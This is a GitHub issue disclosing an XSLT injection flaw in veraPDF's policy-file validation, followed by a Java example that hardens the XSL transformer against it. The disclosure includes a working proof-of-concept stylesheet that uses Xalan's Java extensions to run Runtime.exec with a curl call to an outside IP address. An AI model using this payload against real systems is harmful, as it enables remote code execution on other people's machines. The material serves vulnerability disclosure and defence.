veraPDF has an XSLT injection vulnerability. #1415

Closed
@c1gar

The issue occurs when clicking the execution button, where users can drag and drop policy files into the area where a policy file is not chosen. These policy files are user-controllable, and during the validation of configuration files, an XSL transformation operation is performed. The XSL file used for this operation is uploaded by the user. Due to veraPDF not setting secure parameters during XSL transformation, this could potentially lead to a remote code execution (RCE) vulnerability.
test.xsl
```xml
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
    xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
  <xsl:template match="/">
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtobject,'curl http://101.200.214.173:8888 ')"/>
    <xsl:variable name="processString" select="ob:toString($process)"/>
    <xsl:value-of select="$processString"/>
  </xsl:template>
</xsl:stylesheet>
```
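The missing "secure parameters" on the JAXP side, as an added example (not veraPDF's code and not part of the original report). It assumes the JDK's built-in `TransformerFactory`; the class name `HardenedXslt` and the harmless `Math.max` stylesheet are constructed for illustration.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import java.io.StringWriter;

public class HardenedXslt {

    // Constructed, harmless stylesheet: calls java.lang.Math.max through the same
    // Java-extension namespace mechanism as the stylesheet in the report.
    static final String UNTRUSTED_XSL =
        "<xsl:stylesheet version='1.0'"
      + " xmlns:xsl='http://www.w3.org/1999/XSL/Transform'"
      + " xmlns:m='http://xml.apache.org/xalan/java/java.lang.Math'>"
      + "<xsl:template match='/'><xsl:value-of select='m:max(1, 2)'/></xsl:template>"
      + "</xsl:stylesheet>";

    static TransformerFactory hardenedFactory() throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Disables Java extension functions and applies processing limits.
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Allow no protocols for external DTDs or xsl:import / xsl:include / document().
        // Supported by the JDK's built-in implementation; other implementations may
        // throw IllegalArgumentException for these attributes.
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    // Returns true if the stylesheet was refused, at compile time or at run time.
    static boolean isRejected(String xsl) {
        try {
            Templates t = hardenedFactory().newTemplates(new StreamSource(new StringReader(xsl)));
            t.newTransformer().transform(
                new StreamSource(new StringReader("<doc/>")),
                new StreamResult(new StringWriter()));
            return false;
        } catch (TransformerException e) {
            System.out.println("rejected: " + e.getMessage());
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("extension call blocked = " + isRejected(UNTRUSTED_XSL));
    }
}
```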
